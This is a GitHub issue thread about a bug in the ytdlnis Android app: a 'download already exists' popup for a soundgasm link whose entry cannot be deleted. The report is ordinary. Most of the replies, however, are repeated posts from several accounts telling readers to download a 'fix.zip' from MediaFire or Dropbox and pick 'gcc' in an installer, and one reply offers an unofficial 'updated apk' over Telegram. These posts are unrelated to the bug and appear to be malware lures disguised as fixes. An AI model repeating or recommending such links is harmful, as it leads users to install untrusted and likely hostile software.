### ISSUE TITLE
[BUG] phantom download that doesn't exist and can't be deleted

### ISSUE THREAD

**Issue by Gooberpatrol66** [deniscerri/ytdlnis#554]
** Before making an issue make sure you are using the latest version of yt-dlp in the settings. Perhaps try using the nightly version of yt-dlp. If that didn't help, proceed with the issue

**Describe the bug**
trying to download this link https://soundgasm.net/u/ClassWarAndPuppies/860-Super-Taco-Tuesday-feat-Alex-Nichols-81924
when I do, a popup says "download already exists". the video in the popup has no thumbnail and has a length of -1. pressing "remove" on the video does nothing. pressing "download" does nothing. the video does not appear in any of the panes in "downloads" or "download queue". there is no downloaded file corresponding to the video. 

**To Reproduce**
idk, try downloading the link

**Expected behavior**
a way to delete and re download the video

**Screenshots / Video Recording**
If applicable, add them to help explain your problem.

**(please complete the following information):**
 - Android Version: lineageos 19
 - App Version: 2024.08.21.232751
 - Other Device Information: nord n200

**Additional context**

**Comment by zaednasr** [comment]
dm me on telegram, ill hook up with an updated apk i have been working on
perhaps its fixed

**Comment by esttemanb** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
